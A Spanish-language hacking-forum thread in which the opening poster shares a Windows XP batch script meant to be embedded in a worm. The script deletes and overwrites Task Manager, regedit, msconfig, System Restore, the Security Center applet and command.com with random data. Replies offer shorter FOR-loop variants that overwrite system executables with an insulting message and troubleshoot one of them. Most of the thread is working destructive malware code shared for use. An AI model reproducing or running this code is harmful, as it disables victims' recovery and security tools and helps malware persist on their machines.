Buenas a todos!
ya publiqué anteriormente un par de codigos de batch que podían ser integrados dentro del código general de un gusano. En este post y en los próximos que publique iré ampliando los códigos que subí.
Este código en concreto se encarga de restringir la seguridad de un ordenador corriendo bajo Windows XP:
@echo off
del /Q /F %WINDIR%\System32\taskmgr.exe
del /Q /F %WINDIR%\System32\tasklist.exe
del /Q /F %WINDIR%\System32\regedt32.exe
del /Q /F %WINDIR%\System32\wscui.cpl
del /Q /F %WINDIR%\System32\command.com
del /Q /F %WINDIR%\System32\restore\rstrui.exe
del /Q /F %WINDIR%\System32\restore\srdiag.exe
del /Q /F %WINDIR%\taskman.exe
del /Q /F %WINDIR%\regedit.exe
del /Q /F %WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\regedit"
echo %random%%random%%random%%random%>>"%WINDIR%\regedit"
echo %random%%random%%random%%random%>>"%WINDIR%\regedit"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\regedt32.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\regedt32.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
attrib +s +h +r "%WINDIR%\System32\cmd.com"
Hasta otra!
esta muy bien
pero se podria hacer mas corto con el FOR
me gusta la idea
saludos
Si, aunque solo poniendo un solo echo es suficiente ya que de cualquier manera no funcionará tales ejecutables. O también como usando for como lo dice Darioxhcx.
Saludos
vendria siendo asi ??
for %%a in (taskmgr.exe,tasklist.exe,regedt32.exe,wscui.cpl) do (echo You was Fucked %random%>%windir%\system32\%%a)
Saludos.
Cita de: :: SmartGenius :: en 19 Julio 2008, 04:18 AM
vendria siendo asi ??
for %%a in (taskmgr.exe,tasklist.exe,regedt32.exe,wscui.cpl) do (echo You was Fucked %random%>%windir%\system32\%%a)
Saludos.
lo probe asi
for /r %%a in ( taskmgr.txt,tasklist.txt,regedt32.txt,wscui.txt ) do ( echo You was Fucked %random%%%a>C:\1 )
C:\1 es una carpeta que uso para prubas asi
pero me sale
"acceso denegado"
no se por que u.u
saludos
Cita de: Darioxhcx en 19 Julio 2008, 06:37 AM
lo probe asi
for /r %%a in ( taskmgr.txt,tasklist.txt,regedt32.txt,wscui.txt ) do ( echo You was Fucked %random%%%a>C:\1 )
C:\1 es una carpeta que uso para prubas asi
pero me sale
"acceso denegado"
no se por que u.u
saludos
creo que lo estas haciendo mal, deberia ser >C:\1\%%a , ya que lo que estas haciendo es tratar de redirigir la salida a una carpeta y no creo que sea posible, y ademas que tantos %% pegados pueden poner problema tambien...
Saludos.